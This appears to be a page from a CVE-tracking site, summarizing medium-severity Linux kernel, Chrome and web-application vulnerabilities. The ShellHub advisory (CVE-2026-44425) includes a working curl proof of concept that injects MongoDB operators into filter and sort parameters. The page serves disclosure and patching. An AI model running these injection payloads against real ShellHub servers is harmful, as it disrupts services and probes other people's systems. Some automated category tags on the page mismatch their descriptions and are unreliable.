Skip to main content
CVE-2026-43259 MEDIUM PATCH This Month

In the Linux kernel, the following vulnerability has been resolved: phy: fsl-imx8mq-usb: set platform driver data Add missing platform_set_drvdata() as the data will be used in remove().

Information Disclosure Linux Red Hat Suse
NVD
CVSS 3.1
5.5
EPSS
0.0%
CVE-2026-43247 MEDIUM PATCH This Month

Kernel panic via SError interrupt in Linux kernel media driver (chips-media wave5) when device enters autosuspend during video decoding operations. Local authenticated attackers can trigger a denial of service by queuing buffers to the wave5 video decoder while autosuspend timeout occurs, causing the CPU to access suspended hardware and generate an unrecoverable asynchronous SError, crashing the system. No privilege escalation or code execution; impact limited to availability.

Information Disclosure Linux Red Hat Suse
NVD
CVSS 3.1
5.5
EPSS
0.0%
CVE-2026-43235 MEDIUM PATCH This Month

In the Linux kernel, the following vulnerability has been resolved: media: iris: Add missing platform data entries for SM8750 Two platform-data fields for SM8750 were missed: - get_vpu_buffer_size = iris_vpu33_buf_size Without this, the driver fails to allocate the required internal buffers, leading to basic decode/encode failures during session bring-up. - max_core_mbps = ((7680 * 4320) / 256) * 60 Without this capability exposed, capability checks are incomplete and v4l2-compliance for encoder fails.

Information Disclosure Linux Red Hat Suse
NVD
CVSS 3.1
5.5
EPSS
0.0%
CVE-2026-43234 MEDIUM PATCH This Month

In the Linux kernel, the following vulnerability has been resolved: team: avoid NETDEV_CHANGEMTU event when unregistering slave syzbot is reporting unregister_netdevice: waiting for netdevsim0 to become free. Usage count = 3 ref_tracker: netdev@ffff88807dcf8618 has 1/2 users at __netdev_tracker_alloc include/linux/netdevice.h:4400 [inline] netdev_hold include/linux/netdevice.h:4429 [inline] inetdev_init+0x201/0x4e0 net/ipv4/devinet.c:286 inetdev_event+0x251/0x1610 net/ipv4/devinet.c:1600 notifier_call_chain+0x19d/0x3a0 kernel/notifier.c:85 call_netdevice_notifiers_mtu net/core/dev.c:2318 [inline] netif_set_mtu_ext+0x5aa/0x800 net/core/dev.c:9886 netif_set_mtu+0xd7/0x1b0 net/core/dev.c:9907 dev_set_mtu+0x126/0x260 net/core/dev_api.c:248 team_port_del+0xb07/0xcb0 drivers/net/team/team_core.c:1333 team_del_slave drivers/net/team/team_core.c:1936 [inline] team_device_event+0x207/0x5b0 drivers/net/team/team_core.c:2929 notifier_call_chain+0x19d/0x3a0 kernel/notifier.c:85 call_netdevice_notifiers_extack net/core/dev.c:2281 [inline] call_netdevice_notifiers net/core/dev.c:2295 [inline] __dev_change_net_namespace+0xcb7/0x2050 net/core/dev.c:12592 do_setlink+0x2ce/0x4590 net/core/rtnetlink.c:3060 rtnl_changelink net/core/rtnetlink.c:3776 [inline] __rtnl_newlink net/core/rtnetlink.c:3935 [inline] rtnl_newlink+0x15a9/0x1be0 net/core/rtnetlink.c:4072 rtnetlink_rcv_msg+0x7d5/0xbe0 net/core/rtnetlink.c:6958 netlink_rcv_skb+0x232/0x4b0 net/netlink/af_netlink.c:2550 netlink_unicast_kernel net/netlink/af_netlink.c:1318 [inline] netlink_unicast+0x80f/0x9b0 net/netlink/af_netlink.c:1344 netlink_sendmsg+0x813/0xb40 net/netlink/af_netlink.c:1894 problem. Ido Schimmel found steps to reproduce ip link add name team1 type team ip link add name dummy1 mtu 1499 master team1 type dummy ip netns add ns1 ip link set dev dummy1 netns ns1 ip -n ns1 link del dev dummy1 and also found that the same issue was fixed in the bond driver in commit f51048c3e07b ("bonding: avoid NETDEV_CHANGEMTU event when unregistering slave"). Let's do similar thing for the team driver, with commit ad7c7b2172c3 ("net: hold netdev instance lock during sysfs operations") and commit 303a8487a657 ("net: s/__dev_set_mtu/__netif_set_mtu/") also applied.

Information Disclosure Linux Red Hat Suse
NVD VulDB
CVSS 3.1
5.5
EPSS
0.0%
CVE-2026-43224 MEDIUM PATCH This Month

In the Linux kernel, the following vulnerability has been resolved: io_uring/zcrx: fix sgtable leak on mapping failures In an unlikely case when io_populate_area_dma() fails, which could only happen on a PAGE_POOL_32BIT_ARCH_WITH_64BIT_DMA machine, io_zcrx_map_area() will have an initialised and not freed table. It was supposed to be cleaned up in the error path, but !is_mapped prevents that.

Information Disclosure Linux Red Hat Suse
NVD
CVSS 3.1
5.5
EPSS
0.0%
CVE-2026-43220 MEDIUM PATCH This Month

In the Linux kernel, the following vulnerability has been resolved: iommu/amd: serialize sequence allocation under concurrent TLB invalidations With concurrent TLB invalidations, completion wait randomly gets timed out because cmd_sem_val was incremented outside the IOMMU spinlock, allowing CMD_COMPL_WAIT commands to be queued out of sequence and breaking the ordering assumption in wait_on_sem(). Move the cmd_sem_val increment under iommu->lock so completion sequence allocation is serialized with command queuing. And remove the unnecessary return.

Amd Information Disclosure Linux Red Hat Suse
NVD VulDB
CVSS 3.1
5.5
EPSS
0.0%
CVE-2026-43219 MEDIUM PATCH This Month

In the Linux kernel, the following vulnerability has been resolved: net: cpsw_new: Fix potential unregister of netdev that has not been registered yet If an error occurs during register_netdev() for the first MAC in cpsw_register_ports(), even though cpsw->slaves[0].ndev is set to NULL, cpsw->slaves[1].ndev would remain unchanged. This could later cause cpsw_unregister_ports() to attempt unregistering the second MAC. To address this, add a check for ndev->reg_state before calling unregister_netdev(). With this change, setting cpsw->slaves[i].ndev to NULL becomes unnecessary and can be removed accordingly.

Information Disclosure Linux
NVD VulDB
CVSS 3.1
5.5
EPSS
0.0%
CVE-2026-43217 MEDIUM PATCH This Month

In the Linux kernel, the following vulnerability has been resolved: media: iris: gen2: Add sanity check for session stop In iris_kill_session, inst->state is set to IRIS_INST_ERROR and session_close is executed, which will kfree(inst_hfi_gen2->packet). If stop_streaming is called afterward, it will cause a crash. Add a NULL check for inst_hfi_gen2->packet before sendling STOP packet to firmware to fix that.

Denial Of Service Linux Red Hat Suse
NVD
CVSS 3.1
5.5
EPSS
0.0%
CVE-2026-43216 MEDIUM PATCH This Month

Denial of service in the Linux kernel's net subsystem via deadlock in skb_may_tx_timestamp() when socket timestamp completion occurs in interrupt context while sk_callback_lock is write-locked, affecting local attackers with user privileges on systems with network drivers that complete TX timestamps from dedicated interrupt handlers.

Denial Of Service Null Pointer Dereference Linux
NVD VulDB
CVSS 3.1
5.5
EPSS
0.0%
CVE-2026-43195 MEDIUM PATCH This Month

In the Linux kernel, the following vulnerability has been resolved: drm/amdgpu: validate user queue size constraints Add validation to ensure user queue sizes meet hardware requirements: - Size must be a power of two for efficient ring buffer wrapping - Size must be at least AMDGPU_GPU_PAGE_SIZE to prevent undersized allocations This prevents invalid configurations that could lead to GPU faults or unexpected behavior.

Information Disclosure Linux Red Hat Suse
NVD
CVSS 3.1
5.5
EPSS
0.0%
CVE-2026-43188 MEDIUM PATCH This Month

In the Linux kernel, the following vulnerability has been resolved: ceph: do not propagate page array emplacement errors as batch errors When fscrypt is enabled, move_dirty_folio_in_page_array() may fail because it needs to allocate bounce buffers to store the encrypted versions of each folio. Each folio beyond the first allocates its bounce buffer with GFP_NOWAIT. Failures are common (and expected) under this allocation mode; they should flush (not abort) the batch. However, ceph_process_folio_batch() uses the same `rc` variable for its own return code and for capturing the return codes of its routine calls; failing to reset `rc` back to 0 results in the error being propagated out to the main writeback loop, which cannot actually tolerate any errors here: once `ceph_wbc.pages` is allocated, it must be passed to ceph_submit_write() to be freed. If it survives until the next iteration (e.g. due to the goto being followed), ceph_allocate_page_array()'s BUG_ON() will oops the worker. Note that this failure mode is currently masked due to another bug (addressed next in this series) that prevents multiple encrypted folios from being selected for the same write. For now, just reset `rc` when redirtying the folio to prevent errors in move_dirty_folio_in_page_array() from propagating. Note that move_dirty_folio_in_page_array() is careful never to return errors on the first folio, so there is no need to check for that. After this change, ceph_process_folio_batch() no longer returns errors; its only remaining failure indicator is `locked_pages == 0`, which the caller already handles correctly.

Information Disclosure Linux Red Hat Suse
NVD VulDB
CVSS 3.1
5.5
EPSS
0.0%
CVE-2026-43181 MEDIUM PATCH This Month

In the Linux kernel, the following vulnerability has been resolved: gpio: sysfs: fix chip removal with GPIOs exported over sysfs Currently if we export a GPIO over sysfs and unbind the parent GPIO controller, the exported attribute will remain under /sys/class/gpio because once we remove the parent device, we can no longer associate the descriptor with it in gpiod_unexport() and never drop the final reference. Rework the teardown code: provide an unlocked variant of gpiod_unexport() and remove all exported GPIOs with the sysfs_lock taken before unregistering the parent device itself. This is done to prevent any new exports happening before we unregister the device completely.

Information Disclosure Linux Red Hat Suse
NVD
CVSS 3.1
5.5
EPSS
0.0%
CVE-2026-43179 MEDIUM PATCH This Month

In the Linux kernel, the following vulnerability has been resolved: erofs: fix incorrect early exits for invalid metabox-enabled images Crafted EROFS images with metadata compression enabled can trigger incorrect early returns, leading to folio reference leaks. However, this does not cause system crashes or other severe issues.

Denial Of Service Linux Red Hat Suse
NVD
CVSS 3.1
5.5
EPSS
0.0%
CVE-2026-43165 MEDIUM PATCH This Month

Resource leak in the Linux kernel's hwmon nct7363 hardware monitor driver allows a local, low-privileged user to cause a denial-of-service condition through repeated reference exhaustion. The vulnerability resides in nct7363_present_pwm_fanin, which calls of_parse_phandle_with_args() but never releases the acquired device node reference via of_node_put(), violating the kernel's reference-counting contract for device tree nodes. Exploitation requires physical or local authenticated access to a system equipped with NCT7363 hardware and the driver loaded; no public exploit exists and no active exploitation is confirmed (EPSS: 0.02%, 4th percentile).

Information Disclosure Linux
NVD VulDB
CVSS 3.1
5.5
EPSS
0.0%
CVE-2026-43160 MEDIUM PATCH This Month

NULL pointer dereferences in the Linux kernel's Apple SMC (System Management Controller) MFD driver expose Apple-hardware systems to local denial-of-service. The struct apple_smc mutex was never initialized in apple_smc_probe(), causing occasional crashes when sub-device probe() functions call apple_smc_read() and attempt to acquire the uninitialized lock. Only local, low-privileged users on Apple hardware running an affected kernel can trigger this condition. No public exploit code exists and no active exploitation has been reported; EPSS sits at 0.02% (4th percentile), consistent with a narrow hardware-specific attack surface.

Information Disclosure Linux
NVD VulDB
CVSS 3.1
5.5
EPSS
0.0%
CVE-2026-43155 MEDIUM PATCH This Month

Memory leak in the Linux kernel's MMIO mux driver (mux/mmio subsystem) causes kernel memory exhaustion under local access conditions. The mmio regmap allocated during device probe is never released on probe failure paths or driver unbind, resulting in cumulative memory loss that can degrade availability. No active exploitation is confirmed (not in CISA KEV), and EPSS at 0.02% (4th percentile) reflects minimal real-world exploitation interest, consistent with the local-only attack vector and narrow hardware dependency.

Information Disclosure Linux
NVD VulDB
CVSS 3.1
5.5
EPSS
0.0%
CVE-2026-43154 MEDIUM PATCH This Month

Folio reference leaks in the Linux kernel EROFS filesystem driver allow a local low-privileged user to cause gradual memory resource exhaustion by presenting crafted EROFS images with valid but specially structured volume labels. Affected kernel versions span multiple stable branches including the 6.18 and 6.19 series, as confirmed by ENISA EUVD-2026-27717 and upstream kernel commit data. No public exploit has been identified at time of analysis, and the vulnerability description explicitly limits impact to reference leaks without system crashes, which aligns with the low EPSS score of 0.02% (4th percentile).

Denial Of Service Linux
NVD VulDB
CVSS 3.1
5.5
EPSS
0.0%
CVE-2026-43151 MEDIUM PATCH This Month

Local denial-of-service in the Linux kernel's iris media driver (Qualcomm video codec) results from a regression introduced by commit ad699fa78b59241c9d71a8cafb51525f3dab04d4, now reverted. When a media session enters IRIS_INST_ERROR state and userspace subsequently calls stop_streaming for cleanup, the erroneous check skipped the handler entirely - preventing videobuf2 (vb2) buffer returns and leaving firmware in an inconsistent, non-recoverable state. Affected are systems running the iris V4L2 driver on Qualcomm hardware; no public exploit identified at time of analysis and EPSS is 0.02% (percentile 4%), indicating minimal real-world exploitation activity.

Information Disclosure Linux
NVD VulDB
CVSS 3.1
5.5
EPSS
0.0%
CVE-2026-43146 MEDIUM PATCH This Month

Denial of service in the Linux kernel's iris media driver results from improper error-path handling during internal buffer allocation. When DMA allocation via dma_alloc_attrs() fails, a partially initialized buffer that was prematurely added to the internal buffers->list remains in that list, leading to inconsistent kernel state and potential resource leaks or NULL-pointer dereferences on subsequent access. Affected systems running Linux 6.15 through pre-patch versions of 6.18 and 6.19 with the iris media subsystem active are at risk; no public exploit has been identified and EPSS is 0.02%, indicating low exploitation probability at time of analysis.

Information Disclosure Linux
NVD VulDB
CVSS 3.1
5.5
EPSS
0.0%
CVE-2026-43144 MEDIUM PATCH This Month

Kernel oops (crash) in the Linux kernel brcmfmac SDIO Wi-Fi driver allows a local low-privileged user to cause a denial-of-service by triggering a probe failure on Broadcom SDIO Wi-Fi hardware. The root cause is a double-assignment of sdiodev->bus across brcmf_sdio_probe() and brcmf_sdiod_probe(), leaving an invalid (non-NULL, error-valued) pointer that brcmf_sdio_remove() later dereferences during cleanup. No public exploit has been identified, EPSS is at the 4th percentile, and this is not listed in CISA KEV; risk is primarily a kernel stability concern in specific hardware configurations.

Denial Of Service Null Pointer Dereference Linux
NVD VulDB
CVSS 3.1
5.5
EPSS
0.0%
CVE-2026-43142 MEDIUM PATCH This Month

Memory exhaustion in the Linux kernel's iris gen1 media driver allows a local low-privileged user to progressively consume kernel memory until session close, causing a denial of service. The iris driver fails to destroy internal firmware-managed buffers upon receiving the firmware release response, with the leak compounding across video resolution changes as each change allocates new buffers without reclaiming the prior set. No public exploit exists and EPSS sits at the 4th percentile, indicating negligible opportunistic exploitation risk; impact is limited to availability on systems with iris-compatible media hardware.

Information Disclosure Linux
NVD VulDB
CVSS 3.1
5.5
EPSS
0.0%
CVE-2026-43127 MEDIUM PATCH This Month

A circular locking dependency in the Linux kernel's ntfs3 filesystem driver allows local authenticated attackers with low privileges to cause a denial of service (system hang or crash) by triggering simultaneous operations that deadlock between the MFT run lock and bitmap read-write lock. The vulnerability affects kernel versions prior to 6.18.16, 6.19.6, and 7.0, and requires local access with user-level privileges to exploit.

Information Disclosure Linux Red Hat Suse
NVD VulDB
CVSS 3.1
5.5
EPSS
0.0%
CVE-2026-43122 MEDIUM PATCH This Month

In the Linux kernel, the following vulnerability has been resolved: ACPI: processor: Update cpuidle driver check in __acpi_processor_start() Commit 7a8c994cbb2d ("ACPI: processor: idle: Optimize ACPI idle driver registration") moved the ACPI idle driver registration to acpi_processor_driver_init() and acpi_processor_power_init() does not register an idle driver any more. Accordingly, the cpuidle driver check in __acpi_processor_start() needs to be updated to avoid calling acpi_processor_power_init() without a cpuidle driver, in which case the registration of the cpuidle device in that function would lead to a NULL pointer dereference in __cpuidle_register_device().

Denial Of Service Null Pointer Dereference Linux Red Hat Suse
NVD VulDB
CVSS 3.1
5.5
EPSS
0.0%
CVE-2025-71271 MEDIUM PATCH This Month

Memory leak in hfsplus filesystem driver causes denial of service when superblock setup fails during mount operations. The vulnerability affects Linux kernels when hfsplus is mounted and the setup_bdev_super() function fails after superblock allocation but before hfsplus_fill_super() completes, leaving filesystem-specific data unfreed. Local authenticated users can trigger this condition to exhaust kernel memory and crash the system.

Information Disclosure Linux Red Hat Suse
NVD VulDB
CVSS 3.1
5.5
EPSS
0.0%
CVE-2026-43118 MEDIUM PATCH This Month

Data corruption in Linux kernel btrfs filesystem log replay allows local authenticated attackers to cause files to retain incorrect sizes after crash recovery. When a file is truncated to zero bytes, fssynced, and then a hardlink is created, the file incorrectly retains its pre-truncation size after a power failure and log replay, resulting in data integrity violation with availability impact.

Information Disclosure Linux Red Hat Suse
NVD VulDB
CVSS 3.1
5.5
EPSS
0.0%
CVE-2026-43109 MEDIUM PATCH This Month

Linux kernel shadow stack implementation fails to check for errors from mmap_read_lock_killable() in shstk_pop_sigframe(), allowing a local authenticated attacker to trigger a denial of service by causing the function to proceed with a failed lock acquisition. The vulnerability affects multiple stable kernel versions prior to patched releases 6.18.24, 6.19.14, and 7.0, with EPSS exploitation probability of 0.02% suggesting low real-world exploit likelihood despite the availability of a vendor patch.

Information Disclosure Linux
NVD VulDB
CVSS 3.1
5.5
EPSS
0.0%
CVE-2026-43102 MEDIUM PATCH This Month

Memory leak in the Airoha QDMA RX packet processing function allows local authenticated attackers to cause a denial of service through resource exhaustion. The vulnerability occurs when page pool fragments fail to properly return to the pool during error handling in airoha_qdma_rx_process(), allowing an attacker with local access and low privileges to exhaust kernel memory and crash the system. EPSS exploitation probability is extremely low at 0.02%, reflecting the local-only attack vector and privilege requirement.

Information Disclosure Linux Red Hat Suse
NVD VulDB
CVSS 3.1
5.5
EPSS
0.0%
CVE-2026-43100 MEDIUM PATCH This Month

Null pointer dereference in Linux kernel bridge VLAN filtering code allows local authenticated attackers to trigger a denial of service via a crafted RTM_NEWLINK netlink message with BR_BOOLOPT_FDB_LOCAL_VLAN_0 flag when CONFIG_BRIDGE_VLAN_FILTERING is disabled. The vulnerability occurs because br_fdb_delete_locals_per_vlan_port() and br_fdb_insert_locals_per_vlan_port() dereference a NULL vlan group pointer without validation, causing a kernel panic. No public exploit code identified at time of analysis.

Canonical Denial Of Service Null Pointer Dereference Linux Red Hat +1
NVD VulDB
CVSS 3.1
5.5
EPSS
0.0%
CVE-2026-43096 MEDIUM PATCH This Month

Infinite vCPU fault loop in the Linux kernel's mshv (Microsoft Hypervisor) subsystem allows a local guest VM process to permanently spin a host vCPU thread, exhausting host CPU resources. The flaw exists in mshv_handle_gpa_intercept(), which unconditionally attempts page remaps on all movable-memory faults regardless of access permission - when a guest writes to a read-only Guest Physical Address region, the remap succeeds but the region retains its read-only designation, causing an immediate re-fault in a tight loop. Affected kernel versions run from commit b9a66cd5ccbb9fade15d0e427e19470d8ad35b75 through the fix commits; patched releases 6.19.14 and 7.0 are available. No public exploit has been identified and EPSS is 0.01%, consistent with the local, hypervisor-specific attack surface.

Linux Denial Of Service Red Hat Suse
NVD VulDB
CVSS 3.1
5.5
EPSS
0.0%
CVE-2026-7931 MEDIUM PATCH This Month

UI spoofing in Google Chrome on iOS prior to version 148.0.7778.96 allows remote attackers to deceive users through crafted HTML pages that manipulate the browser interface. The vulnerability stems from insufficient validation of untrusted input and has a CVSS score of 5.4 (medium severity). Exploitation requires user interaction with a malicious webpage but can result in information disclosure and denial of service on affected iOS devices.

Apple Google Information Disclosure Red Hat Suse +1
NVD VulDB
CVSS 3.1
5.4
EPSS
0.1%
CVE-2026-44425 MEDIUM PATCH GHSA This Month

## Summary The device list endpoint accepts user-controlled identifiers in two places that are passed directly as BSON/SQL keys in the database layer without validation: 1. The `name` field of each filter property in the base64-encoded `filter` query parameter. 2. The `sort_by` query parameter. Any authenticated user can craft payloads that cause the aggregation/query to fail and the API to return HTTP 500 with no body, with no rate limiting applied. ## Severity **CVSS 3.1: 6.5 (Medium)** CWE-20 (Improper Input Validation) CWE-943 (Improper Neutralization of Special Elements in Data Query Logic) ## Affected versions ShellHub Community v0.24.1 (validated). All versions sharing the same filter and sort pipeline (`api/store/mongo/query-options.go`). ## Root cause ### Vector 1 - Filter field name `api/store/mongo/query-options.go:140`: ```go conditions = append(conditions, bson.M{param.Name: property}) ``` `param.Name` is the `name` field from the JSON filter supplied by the client. It becomes a BSON map key with no validation, allowing BSON operator names (`$where`, `$ne`, `$or`, `$regex`) and virtual pipeline-computed fields (`namespace`, paths containing `$`) to be injected. ### Vector 2 - Sort-by field Similar pattern in the sort pipeline where the `sort_by` query parameter is used to build `bson.M{"$sort": {sortBy: order}}` without validation. ### Additional observation `fromContains` (`api/store/mongo/internal/filters.go:60-69`) passes user input directly as `$regex` value, which enables blind regex extraction over string fields within the caller's tenant and potential ReDoS amplification on large datasets. ```go func fromContains(value interface{}) (bson.M, error) { switch value.(type) { case string: return bson.M{"$regex": value, "$options": "i"}, nil ``` ## Proof of concept (validated live against v0.24.1) ```bash TOKEN=<valid-user-jwt> # Helper: base64-encode a filter payload encode_filter() { python3 -c 'import json,base64,sys;print(base64.b64encode(json.dumps(json.loads(sys.argv[1])).encode()).decode())' "$1" } # --- Vector 1: filter field injection --- # Baseline: legitimate filter -> 200 F=$(encode_filter '[{"type":"property","params":{"name":"name","operator":"contains","value":"anything"}}]') curl -sS -w "HTTP=%{http_code}\n" "http://target/api/devices?filter=$F" \ -H "Authorization: Bearer $TOKEN" # HTTP=200 # Exploit 1a: Mongo operator as field name F=$(encode_filter '[{"type":"property","params":{"name":"$where","operator":"contains","value":"x"}}]') curl -sS -w "HTTP=%{http_code}\n" "http://target/api/devices?filter=$F" \ -H "Authorization: Bearer $TOKEN" # HTTP=500 # Exploit 1b: nested object as value F=$(encode_filter '[{"type":"property","params":{"name":"status","operator":"eq","value":{"$ne":"accepted"}}}]') curl -sS -w "HTTP=%{http_code}\n" "http://target/api/devices?filter=$F" \ -H "Authorization: Bearer $TOKEN" # HTTP=500 # Exploit 1c: pipeline-computed field as filter name F=$(encode_filter '[{"type":"property","params":{"name":"namespace","operator":"contains","value":"."}}]') curl -sS -w "HTTP=%{http_code}\n" "http://target/api/devices?filter=$F" \ -H "Authorization: Bearer $TOKEN" # HTTP=500 # --- Vector 2: sort-by injection --- # Baseline: legitimate sort -> 200 curl -sS -w "HTTP=%{http_code}\n" "http://target/api/devices?sort_by=name" \ -H "Authorization: Bearer $TOKEN" # HTTP=200 # Exploit 2a: Mongo operator as sort field curl -sS -w "HTTP=%{http_code}\n" "http://target/api/devices?sort_by=\$where" \ -H "Authorization: Bearer $TOKEN" # HTTP=500 # Exploit 2b: path containing $ curl -sS -w "HTTP=%{http_code}\n" "http://target/api/devices?sort_by=_id.%24%24%24" \ -H "Authorization: Bearer $TOKEN" # HTTP=500 # Exploit 2c: oversized sort field (no length validation) curl -sS -w "HTTP=%{http_code}\n" "http://target/api/devices?sort_by=$(python3 -c 'print("A"*5000)')" \ -H "Authorization: Bearer $TOKEN" # HTTP=500 # Exploit 2d: non-indexable internal field curl -sS -w "HTTP=%{http_code}\n" "http://target/api/devices?sort_by=tenant_id" \ -H "Authorization: Bearer $TOKEN" # HTTP=500 # --- Repeat to demonstrate no rate limiting --- for i in $(seq 1 20); do curl -sS -o /dev/null -w "%{http_code} " "http://target/api/devices?sort_by=\$where" \ -H "Authorization: Bearer $TOKEN" done # 500 500 500 500 500 500 500 500 500 500 500 500 500 500 500 500 500 500 500 500 ``` **Confirmed field values that trigger 500:** - Filter name: `$where`, `$regex`, `$or`, `$ne`, `remote_addr`, `tenant_id`, `namespace`, any path containing `$` after a `.` - Sort-by: `$where`, `_id.$$$`, `tenant_id`, `password.hash`, overly long strings **Observed response characteristics:** ``` HTTP/1.1 500 Internal Server Error Content-Length: 0 X-Request-Id: <id> ← logged as error in backend ``` Response time 8-18 ms per request, server process stays alive, no degradation across 20 consecutive requests. ## Impact - **Availability (low):** unrestricted HTTP 500 generation by any authenticated caller; log noise, SIEM false-positives, WAF bypass fingerprinting. - **Information disclosure (low):** potential stack trace exposure depending on logger configuration; attacker can fingerprint the underlying MongoDB aggregation pipeline and schema. - **Resource exhaustion (potential):** user-controlled `$regex` value on large tenant datasets enables ReDoS amplification (not reproducible on a 2-device test instance, but attack surface is real on production-scale deployments). - **Forensics difficulty:** unified 500 response makes it hard to distinguish legitimate errors from attacker probes in logs. ## Suggested fix 1. **Allowlist filter and sort field names per collection.** Add a whitelist of allowed `param.Name` and `sort_by` values for each model exposed via filters (`device`, `session`, etc.). Reject anything else with HTTP 400. 2. **Reject BSON operators in field names.** Even if an allowlist is not practical, reject values that: - start with `$` - contain `$` after a `.` - contain characters outside `[A-Za-z0-9_.]` - exceed a reasonable length (e.g., 64 characters) 3. **Validate `value` shape.** For `contains`/`eq`/`ne` operators, reject non-primitive values (objects, arrays of objects). 4. **Catch aggregation errors.** In `api/store/mongo/query-options.go`, wrap pipeline execution and return a typed error that the HTTP layer maps to 400 Bad Request instead of 500. 5. **Limit regex complexity.** In `fromContains`, reject regex values longer than N characters or containing nested quantifiers (`(...)+`, `(...)*`, `(.+)+`, etc.) to mitigate ReDoS.

Denial Of Service Information Disclosure
NVD GitHub
CVSS 3.1
5.4
EPSS
0.1%
CVE-2026-8015 MEDIUM PATCH This Month

Inappropriate implementation in Media in Google Chrome prior to 148.0.7778.96 allowed a remote attacker to perform UI spoofing via a crafted HTML page. (Chromium security severity: Low)

Information Disclosure Google Red Hat Suse Chrome
NVD VulDB
CVSS 3.1
5.4
EPSS
0.1%
CVE-2026-8003 MEDIUM PATCH This Month

Insufficient validation of untrusted input in TabGroups in Google Chrome prior to 148.0.7778.96 allowed a remote attacker to perform UI spoofing via malicious network traffic. (Chromium security severity: Low)

Information Disclosure Google Red Hat Suse Chrome
NVD
CVSS 3.1
5.4
EPSS
0.1%
CVE-2026-7998 MEDIUM PATCH This Month

Insufficient validation of untrusted input in Dialog in Google Chrome prior to 148.0.7778.96 allowed a remote attacker who had compromised the renderer process to perform UI spoofing via a crafted HTML page. (Chromium security severity: Low)

Information Disclosure Google Red Hat Suse Chrome
NVD
CVSS 3.1
5.4
EPSS
0.1%
CVE-2026-7935 MEDIUM PATCH This Month

UI spoofing vulnerability in Google Chrome prior to 148.0.7778.96 allows remote attackers to deceive users through crafted HTML pages that manipulate the speech interface, potentially disclosing sensitive information or causing denial of service. The vulnerability requires user interaction (clicking or interacting with the malicious page) and affects the speech component's visual presentation. Chromium severity is rated Medium; no active exploitation has been publicly confirmed.

Information Disclosure Google Red Hat Suse Chrome
NVD VulDB
CVSS 3.1
5.4
EPSS
0.1%
CVE-2026-8019 MEDIUM PATCH This Month

Insufficient policy enforcement in WebApp in Google Chrome prior to 148.0.7778.96 allowed a remote attacker to perform UI spoofing via a crafted HTML page. (Chromium security severity: Low)

Information Disclosure Google Red Hat Suse Chrome
NVD VulDB
CVSS 3.1
5.4
EPSS
0.1%
CVE-2026-36358 MEDIUM This Month

Stored cross-site scripting in Juzaweb CMS 5.0.0 allows authenticated remote attackers to inject arbitrary JavaScript via the Add Banner Ads function, exploitable with user interaction (page visit). The vulnerability enables credential theft, session hijacking, and defacement of administrative interfaces. A proof-of-concept is publicly available on GitHub, though exploitation requires authenticated access and victim interaction with a malicious payload.

XSS RCE N A
NVD GitHub
CVSS 3.1
5.4
EPSS
0.0%
CVE-2026-7962 MEDIUM PATCH This Month

Insufficient policy enforcement in DirectSockets API in Google Chrome prior to version 148.0.7778.96 allows remote attackers to perform arbitrary read and write operations through a crafted malicious Chrome extension. The vulnerability requires user interaction (extension installation) but affects the core security model of the browser's socket access control, exposing local network resources to unauthorized access by untrusted extensions.

Information Disclosure Google Red Hat Suse Chrome
NVD VulDB
CVSS 3.1
5.4
EPSS
0.0%
CVE-2026-7950 MEDIUM PATCH This Month

Out-of-bounds read and write in the GFX component of Google Chrome prior to version 148.0.7778.96 allows remote attackers to perform arbitrary memory read and write operations through malicious network traffic. The vulnerability requires user interaction (clicking a link or visiting a malicious page) but does not require authentication. Chromium rated the security severity as Medium; CVSS 5.4 reflects moderate impact (confidentiality and integrity compromise without availability loss). No active exploitation confirmed in CISA KEV at time of analysis.

Google Information Disclosure Buffer Overflow Red Hat Suse +1
NVD VulDB
CVSS 3.1
5.4
EPSS
0.0%
CVE-2026-8012 MEDIUM PATCH This Month

Inappropriate implementation in MHTML in Google Chrome prior to 148.0.7778.96 allowed a remote attacker who had compromised the renderer process to inject arbitrary scripts or HTML (UXSS) via a crafted HTML page. (Chromium security severity: Low)

XSS Google Red Hat Suse Chrome
NVD VulDB
CVSS 3.1
5.4
EPSS
0.0%
CVE-2026-7939 MEDIUM PATCH This Month

Google Chrome versions prior to 148.0.7778.96 contain an XSS vulnerability in the SanitizerAPI that allows remote attackers to inject arbitrary scripts or HTML through crafted HTML pages. The vulnerability requires user interaction (visiting a malicious page) but carries medium severity due to its ability to compromise confidentiality and integrity. No public exploit code or active exploitation in CISA KEV has been identified at the time of analysis.

XSS Google Red Hat Suse Chrome
NVD VulDB
CVSS 3.1
5.4
EPSS
0.0%
CVE-2026-7958 MEDIUM PATCH This Month

Uncontrolled XSS vulnerability in Google Chrome's ServiceWorker implementation prior to version 148.0.7778.96 allows attackers to inject arbitrary scripts or HTML into web pages when users install a malicious Chrome extension, bypassing same-origin policy protections. The vulnerability requires user interaction (extension installation) but can be exploited remotely with low attack complexity. CVSS score of 5.4 reflects medium severity; no active exploitation has been publicly reported.

XSS Google Red Hat Suse Chrome
NVD VulDB
CVSS 3.1
5.4
EPSS
0.0%
CVE-2026-8008 MEDIUM PATCH This Month

Inappropriate implementation in DevTools in Google Chrome prior to 148.0.7778.96 allowed an attacker who convinced a user to install a malicious extension to perform UI spoofing via a crafted Chrome Extension. (Chromium security severity: Low)

Information Disclosure Google Red Hat Suse Chrome
NVD VulDB
CVSS 3.1
5.4
EPSS
0.0%
CVE-2026-8006 MEDIUM PATCH This Month

Insufficient policy enforcement in DevTools in Google Chrome prior to 148.0.7778.96 allowed an attacker who convinced a user to install a malicious extension to perform UI spoofing via a crafted Chrome Extension. (Chromium security severity: Low)

Information Disclosure Google Red Hat Suse Chrome
NVD VulDB
CVSS 3.1
5.4
EPSS
0.0%
CVE-2026-20219 MEDIUM This Month

Insecure direct object reference (IDOR) in Cisco Slido REST API allows authenticated remote attackers to view other users' social profile data and manipulate quiz or poll results. The vulnerability requires valid authentication but no user interaction, affecting confidentiality and integrity of user data and poll integrity. Cisco has released a patched version; no public exploit code or active exploitation has been identified at the time of analysis.

Authentication Bypass Cisco
NVD
CVSS 3.1
5.4
EPSS
0.0%
CVE-2026-42458 MEDIUM PATCH GHSA This Month

Reflected cross-site scripting (XSS) in OpenMage Magento LTS versions up to 20.17.0 allows authenticated admin users to inject arbitrary JavaScript via the Import/Export Dataflow Profiles run interface. The vulnerability exists in the System → Import/Export → Dataflow Profiles page where unsanitized filename parameters are reflected into HTML context, enabling cookie theft and admin panel defacement. The exploitation requires admin panel access and user interaction to click a malicious link, but no network-based unauthenticated exploitation is possible.

XSS PHP
NVD GitHub
CVSS 4.0
5.3
EPSS
0.0%
CVE-2026-44373 MEDIUM PATCH GHSA This Month

